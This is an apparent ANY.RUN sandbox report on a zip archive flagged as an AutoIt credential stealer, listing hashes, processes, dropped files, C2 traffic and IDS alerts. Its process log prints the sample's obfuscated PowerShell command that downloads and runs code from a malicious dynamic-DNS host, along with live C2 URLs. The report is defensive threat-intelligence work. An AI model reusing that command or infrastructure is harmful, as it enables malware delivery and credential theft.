analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

30032020-master.zip

Full analysis: https://app.any.run/tasks/7eeed7f8-34be-4a4f-9df7-603d2d8c901f
Verdict: Malicious activity
Threats:

Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns.

Malware Trends Tracker     >>>
Analysis date: March 31, 2020, 02:21:21
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
autoit
stealer
Indicators:
MIME: application/zip
File info: Zip archive data, at least v1.0 to extract
MD5:

5F61C074AFCA4474E8E730CE54AE4A53

SHA1:

4034172F262922FBB60457CFA09E43B10E21A46A

SHA256:

819E308CAFFB26D16FBF7A10372EE5B9EBF7748799918DC3E0B125E52F8106C0

SSDEEP:

1536:qmWlmcNQnkIbVnpm843iG4BKjofbLGIooyOqnDZa:qdANbVo8IiPfGRdOqDZa

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Application was dropped or rewritten from another process

      • x.exe (PID: 3312)
      • x.exe (PID: 3348)
      • x.exe (PID: 3328)
      • _aqdnxu4_.exe (PID: 3896)

    • Executes PowerShell scripts

      • cmd.exe (PID: 3708)

    • Connects to CnC server

      • powershell.exe (PID: 3096)
      • _aqdnxu4_.exe (PID: 3896)

    • Writes to a start menu file

      • powershell.exe (PID: 3096)

    • Loads the Task Scheduler COM API

      • powershell.exe (PID: 3096)
      • schtasks.exe (PID: 2116)

    • Loads dropped or rewritten executable

      • SearchProtocolHost.exe (PID: 3548)
      • _aqdnxu4_.exe (PID: 3896)

    • Stealing of credential data

      • _aqdnxu4_.exe (PID: 3896)

  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • WinRAR.exe (PID: 3776)
      • powershell.exe (PID: 3096)

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 3708)

    • Creates files in the user directory

      • powershell.exe (PID: 3096)
      • OUTLOOK.EXE (PID: 3892)

    • Drop AutoIt3 executable file

      • powershell.exe (PID: 3096)

    • Executed via COM

      • OUTLOOK.EXE (PID: 4048)
      • explorer.exe (PID: 3796)

    • Executed via Task Scheduler

      • explorer.exe (PID: 256)
      • schtasks.exe (PID: 2116)

    • Reads Environment values

      • _aqdnxu4_.exe (PID: 3896)

  • INFO

    • Manual execution by user

      • x.exe (PID: 3348)
      • WinRAR.exe (PID: 3776)
      • cmd.exe (PID: 3708)
      • x.exe (PID: 3328)
      • OUTLOOK.EXE (PID: 3892)

    • Reads settings of System Certificates

      • powershell.exe (PID: 3096)

    • Reads Internet Cache Settings

      • OUTLOOK.EXE (PID: 4048)
      • OUTLOOK.EXE (PID: 3892)

    • Reads internet explorer settings

      • OUTLOOK.EXE (PID: 3892)

    • Reads Microsoft Office registry keys

      • OUTLOOK.EXE (PID: 4048)
      • OUTLOOK.EXE (PID: 3892)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipFileName: 30032020-master/
ZipUncompressedSize: -
ZipCompressedSize: -
ZipCRC: 0x00000000
ZipModifyDate: 2020:03:30 09:50:24
ZipCompression: None
ZipBitFlag: -
ZipRequiredVersion: 10
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
59
Monitored processes
15
Malicious processes
5
Suspicious processes
2

Behavior graph

Click at the process to see the details
start drop and start winrar.exe no specs winrar.exe x.exe no specs x.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe x.exe no specs outlook.exe searchprotocolhost.exe no specs outlook.exe explorer.exe no specs explorer.exe no specs _aqdnxu4_.exe schtasks.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2896"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\Desktop\30032020-master.zip"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.60.0
3776"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\Desktop\30032020-master.zip"C:\Program Files\WinRAR\WinRAR.exe
explorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.60.0
3312"C:\Users\admin\AppData\Local\Temp\Rar$EXa3776.18890\30032020-master\x.exe" C:\Users\admin\AppData\Local\Temp\Rar$EXa3776.18890\30032020-master\x.exeWinRAR.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Installer
Exit code:
2147942402
Version:
1.3.35.441
3348"C:\Users\admin\Desktop\x.exe" C:\Users\admin\Desktop\x.exeexplorer.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Installer
Exit code:
2147942402
Version:
1.3.35.441
3708cmd /c ""C:\Users\admin\Desktop\3003-comprobantedigital.cmd" "C:\Windows\system32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3376C:\Windows\system32\cmd.exe /S /D /c" echo ieX("Ie`X`(N`ew-oBJ`e`Ct N`et.`Web`ClIeNt`).DOwnlOa`d`StRIN`G('http://jkue.myftp.biz/mx/H1K7R4Y9I5E9b3cnShl/kk/H1K7R4Y9I5E9b3cnShl')"); "C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3096WindowsPowerShell\v1.0\powershell.exe -nop -win 1 -C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3328"C:\Users\admin\Desktop\x.exe" C:\Users\admin\Desktop\x.exeexplorer.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Installer
Exit code:
2147942402
Version:
1.3.35.441
4048"C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Outlook
Exit code:
0
Version:
14.0.6025.1000
3548"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe4_ Global\UsGthrCtrlFltPipeMssGthrPipe4 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" C:\Windows\System32\SearchProtocolHost.exeSearchIndexer.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Microsoft Windows Search Protocol Host
Exit code:
0
Version:
7.00.7600.16385 (win7_rtm.090713-1255)
Total events
4 615
Read events
3 743
Write events
0
Delete events
0

Modification events

No data
Executable files
5
Suspicious files
9
Text files
60
Unknown types
5

Dropped files

PID
Process
Filename
Type
3776WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRa3776.18620\30032020-master\3003-comprobantedigital.cmd
MD5:
SHA256:
3776WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRa3776.20321\30032020-master\x.exe
MD5:
SHA256:
3096powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4E0EFL7C0BANSASWQ64B.temp
MD5:
SHA256:
3096powershell.exeC:\Users\Public\_aqdnxu4_\12.dll
MD5:
SHA256:
3096powershell.exeC:\users\public\_aqdnxu4_\_aqdnxu4_.LNS
MD5:
SHA256:
4048OUTLOOK.EXEC:\Users\admin\AppData\Local\Temp\CVREFF1.tmp.cvr
MD5:
SHA256:
3096powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:3B712DE36DC1672EC51A90C5EE31744F
SHA256:DDE2E429BD6DAA8AA6C9FED090F7C8B96BB95A0AD3E53FE900F99F21E3780AA1
3096powershell.exeC:\users\public\_aqdnxu4_\_aqdnxu4_.zipcompressed
MD5:76602E69A246E4061FAB5BA5715DA300
SHA256:CECC7161B3F8E8CCE0340CF23F9DB70E924F019F952D3AA8218811BFCA1EEA21
3096powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFa7c2c7.TMPbinary
MD5:3B712DE36DC1672EC51A90C5EE31744F
SHA256:DDE2E429BD6DAA8AA6C9FED090F7C8B96BB95A0AD3E53FE900F99F21E3780AA1
3776WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXa3776.18890\30032020-master\3003-comprobantedigital.cmdtext
MD5:32F5280DE01983ACD75606892503BEEF
SHA256:DDF11349B052D4740A12F4DC5AE02E76C92C280228F967BED8DC671CF832827E
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
9
DNS requests
5
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4048
OUTLOOK.EXE
GET
64.4.26.155:80
http://config.messenger.msn.com/config/msgrconfig.asmx?op=GetOlcConfig
US
whitelisted
3096
powershell.exe
POST
200
89.36.213.180:80
http://jkue.myftp.biz/mx/lists/kk/index.php?list
FR
malicious
3096
powershell.exe
GET
200
89.36.213.180:80
http://jkue.myftp.biz/mx/H1K7R4Y9I5E9b3cnShlMD/kk/md.zip
FR
compressed
12.2 Mb
malicious
3096
powershell.exe
GET
200
89.36.213.180:80
http://jkue.myftp.biz/mx/H1K7R4Y9I5E9b3cnShl/kk/H1K7R4Y9I5E9b3cnShl
FR
text
15.3 Kb
malicious
3892
OUTLOOK.EXE
GET
64.4.26.155:80
http://config.messenger.msn.com/config/msgrconfig.asmx?op=GetOlcConfig
US
whitelisted
3096
powershell.exe
POST
200
89.36.213.180:80
http://jkue.myftp.biz/mx/H1K7R4Y9I5E9b3cnShl/kk/index.php
FR
text
6 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3892
OUTLOOK.EXE
64.4.26.155:80
config.messenger.msn.com
Microsoft Corporation
US
whitelisted
3896
_aqdnxu4_.exe
89.36.213.180:443
jkue.myftp.biz
Aruba SAS
FR
malicious
3096
powershell.exe
89.36.213.180:80
jkue.myftp.biz
Aruba SAS
FR
malicious
4048
OUTLOOK.EXE
64.4.26.155:80
config.messenger.msn.com
Microsoft Corporation
US
whitelisted

DNS requests

Domain
IP
Reputation
jkue.myftp.biz
  • 89.36.213.180
malicious
config.messenger.msn.com
  • 64.4.26.155
whitelisted
newlife2020.club
  • 89.36.213.180
malicious

Threats

PID
Process
Class
Message
Potentially Bad Traffic
ET INFO DYNAMIC_DNS Query to a Suspicious *.myftp.biz Domain
Potentially Bad Traffic
ET INFO Observed DNS Query to .biz TLD
3096
powershell.exe
Potentially Bad Traffic
ET INFO DYNAMIC_DNS HTTP Request to a *.myftp.biz Domain
3096
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] PowerShell/Agent.HG
3096
powershell.exe
Potentially Bad Traffic
ET INFO DYNAMIC_DNS HTTP Request to a *.myftp.biz Domain
3096
powershell.exe
Potentially Bad Traffic
ET INFO DYNAMIC_DNS HTTP Request to a *.myftp.biz Domain
3096
powershell.exe
Potentially Bad Traffic
ET INFO DYNAMIC_DNS HTTP Request to a *.myftp.biz Domain
3896
_aqdnxu4_.exe
Potentially Bad Traffic
ET INFO TLS Handshake Failure
3 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
30032020-master.zip